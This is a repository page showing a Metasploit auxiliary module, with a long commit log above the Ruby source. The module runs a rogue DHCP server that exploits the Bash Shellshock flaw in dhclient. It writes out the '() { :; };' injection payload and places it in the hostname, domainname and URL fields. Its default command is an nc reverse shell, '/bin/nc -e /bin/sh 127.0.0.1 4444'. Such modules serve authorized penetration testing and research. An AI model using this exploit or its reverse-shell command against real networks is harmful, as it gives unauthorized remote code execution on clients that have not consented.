adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/modules/auxiliary/server/dhclient_bash_env.rb
T
Clément Notin 33e35bae7c Add descriptions to auxiliary modules Actions 
And a little formatting
Closes #13403

Update modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/backupexec/dump.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/android/android_stock_browser_iframe.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/tikiwiki/tikidblib.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/smb.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/telnet.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/vnc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/fakedns.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/tftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/gzip_bomb_dos.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes2.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/webkitplus.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/example.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_lanipleak.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/firefox_pdfjs_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/samsung_browser_sop_bypass.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_basic.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_ntlm.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/http_ntlmrelay.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks4a.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks5.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/sip.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/postgresql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/local_hwbridge.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/webkit_xslt_dropper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks_unc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/client/iec104/iec104.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/drda.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/ftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mssql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mysql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/pop3.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/dns/spoofhelper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/printjob_capture.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update description following Actions removal

Update modules/auxiliary/gather/browser_info.rb

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
2020-05-17 14:51:14 -05:00

88 lines
2.5 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/dhcp'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DHCPServer
def initialize
super(
'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets dhclient by responding
to DHCP requests with a malicious hostname, domainname, and URL which are then
passed to the configuration scripts as environment variables, resulting in code
execution.
},
'Author' =>
[
'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
'Stephane Chazelas', # Vulnerability discovery
'Ramon de C Valle' # This module
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service', 'Description' => 'Run malicious DHCP server' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service',
'References' => [
[ 'CVE', '2014-6271' ],
[ 'CWE', '94' ],
[ 'OSVDB', '112004' ],
[ 'EDB', '34765' ],
[ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],
[ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
[ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
],
'DisclosureDate' => 'Sep 24 2014',
'Notes' =>
{
'AKA' => ['Shellshock']
}
)
register_options(
[
OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
])
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
end
def run
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
hash = datastore.copy
hash['DOMAINNAME'] = value
hash['HOSTNAME'] = value
hash['URL'] = value
# This loop is required because the current DHCP Server exits after the
# first interaction.
loop do
begin
start_service(hash)
while @dhcp.thread.alive?
select(nil, nil, nil, 2)
end
rescue Interrupt
break
ensure
stop_service
end
end
end
end
Reference in New Issue View Git Blame Copy Permalink